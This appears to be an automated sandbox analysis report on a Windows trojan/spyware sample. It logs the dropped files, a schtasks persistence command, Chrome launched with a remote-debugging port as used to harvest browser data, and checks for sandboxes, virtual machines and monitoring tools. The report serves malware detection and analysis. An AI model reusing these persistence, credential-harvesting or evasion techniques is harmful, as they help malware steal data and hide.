Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2A50D0 7_2_6C2A50D0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B3560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2AADB0 appears 49 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1756
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: vbnvzqtd ZLIB complexity 0.99427766716952
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/7@10/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6668
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000003.00000002.2406160796.0000285400714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000003.00000002.2406603239.000028540074C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 39%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2276,i,7761635936261596126,5114517660047510357,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1756
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2276,i,7761635936261596126,5114517660047510357,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: file.exe Static file information: File size 4425728 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of vbnvzqtd is bigger than: 0x100000 < 0x1bd600
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B38230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 7_2_00B38230
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x43c911 should be: 0x442b38
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: vbnvzqtd
Source: file.exe Static PE information: section name: ugjoxxza
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B3A521 push es; iretd 7_2_00B3A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C290C30 push eax; mov dword ptr [esp], edi 7_2_6C290DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C25ED10 push eax; mov dword ptr [esp], ebx 7_2_6C25EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C234E31 push eax; mov dword ptr [esp], ebx 7_2_6C234E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C228E7A push edx; mov dword ptr [esp], ebx 7_2_6C228E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22A947 push eax; mov dword ptr [esp], ebx 7_2_6C22A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C230AA2 push eax; mov dword ptr [esp], ebx 7_2_6C230AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C248AA0 push eax; mov dword ptr [esp], ebx 7_2_6C24909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C232AAC push edx; mov dword ptr [esp], ebx 7_2_6C232AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C25EAB0 push eax; mov dword ptr [esp], ebx 7_2_6C25EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C262BF0 push eax; mov dword ptr [esp], ebx 7_2_6C262F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C262BF0 push edx; mov dword ptr [esp], ebx 7_2_6C262F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C228435 push edx; mov dword ptr [esp], ebx 7_2_6C228449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C248460 push eax; mov dword ptr [esp], ebx 7_2_6C248A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22048B push eax; mov dword ptr [esp], ebx 7_2_6C2204A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2204E0 push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C201CFA push eax; mov dword ptr [esp], ebx 7_2_6C2B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C201CFA push eax; mov dword ptr [esp], ebx 7_2_6C2B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22A5A7 push eax; mov dword ptr [esp], ebx 7_2_6C22A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C262620 push eax; mov dword ptr [esp], ebx 7_2_6C262954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C262620 push edx; mov dword ptr [esp], ebx 7_2_6C262973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2206A2 push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2386A1 push 890005EAh; ret 7_2_6C2386A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2206A6 push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2706B0 push eax; mov dword ptr [esp], ebx 7_2_6C270A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2266F3 push edx; mov dword ptr [esp], ebx 7_2_6C226707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2206FD push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22070E push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22A777 push eax; mov dword ptr [esp], ebx 7_2_6C22A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C230042 push eax; mov dword ptr [esp], ebx 7_2_6C230056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1FE0D0 push eax; mov dword ptr [esp], ebx 7_2_6C2B6AF6
Source: file.exe Static PE information: section name: vbnvzqtd entropy: 7.9551999581431305
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127D01D second address: 127D028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F1F80D77646h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269326 second address: 1269338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jns 00007F1F81013DA6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269338 second address: 1269342 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1F80D7764Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127BFDF second address: 127BFE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127BFE4 second address: 127BFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127BFEA second address: 127C002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1F81013DA6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jne 00007F1F81013DA6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C002 second address: 127C020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77651h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F1F80D77646h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C020 second address: 127C038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1F81013DAEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C038 second address: 127C03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C17B second address: 127C187 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1F81013DA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C187 second address: 127C191 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F80D7764Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C191 second address: 127C199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
